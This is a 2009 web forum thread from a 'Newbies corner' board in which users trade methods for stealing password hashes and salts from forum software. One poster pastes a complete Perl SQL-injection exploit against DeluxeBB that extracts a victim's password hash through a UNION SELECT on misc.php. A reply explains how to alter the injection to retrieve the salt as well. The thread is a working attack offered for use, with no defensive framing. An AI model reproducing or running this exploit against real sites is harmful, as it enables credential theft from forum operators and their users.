 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 411
 Members: 0
 Total: 411
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
exploit |
|
 Posted: Thu Apr 30, 2009 5:26 pm |
 |
|
| access101 |
| Regular user |
 |
| |
| Joined: Apr 29, 2009 |
| Posts: 21 |
|
|
|
 |
|
 |
|
i was wondering if there is a vbulletin exploit(or phpbb) that gets the HASH and Salt(it has to be a perl script..i cant get php to compile..even with my own apache server and php installed)
i do have my own exploit that get just the hash...but returns no salt...........therefore it is useless....
any ideas? links? |
|
|
|
|
|
Re: exploit |
|
| Posted: Fri May 01, 2009 4:39 am |
|
|
| capt |
| Advanced user |
 |
| |
| Joined: Nov 04, 2008 |
| Posts: 232 |
|
|
|
|
|
|
|
| access101 wrote: |
i do have my own exploit that get just the hash...but returns no salt...........therefore it is useless....
any ideas? links? |
If the exploit is getting the hash it can get the salt.. your just using a exploit that someone created and you obviously didnt care to look at the coding. Its probably a sql injection which is getting the hash out of the database. Exploits dont need to be runned threw perl or php. People make it so its easier on other people and quicker i suppose... |
|
|
|
|
|
|
|
|
| Posted: Fri May 01, 2009 5:09 am |
|
|
| access101 |
| Regular user |
|
| |
| Joined: Apr 29, 2009 |
| Posts: 21 |
|
|
|
|
|
|
|
ok i was wondering do u or anybody have the exploit code to get the salt for VBBULLETIN OR DELUXEBB
i have a exploit here
| Code: |
#!/usr/bin/perl
use IO::Socket;
print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print
"------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print
"------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$server", PeerPort => "80") || die "[-]
CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT
]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print
"--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print
"------------------------------------------------------------------------------------------------\r\n";
#########################################################
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
#########################################################
|
what i need is the UNION SELECT CODE TO GET THE SALT...(ex this is for ipb board:
members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1)).....)
if i have this code i can edit the perl exploit to the the salt also |
|
|
|
|
|
|
|
|
| Posted: Fri May 01, 2009 2:39 pm |
|
|
| capt |
| Advanced user |
|
| |
| Joined: Nov 04, 2008 |
| Posts: 232 |
|
|
|
|
|
|
|
| Code: | | misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users% |
Thats your injection but this isnt pulling data out from vBulletin neither IPB. Its for deluxebb. This wouldnt work for vBulletin.
and all you have to do is change pass to salt in the injection. |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
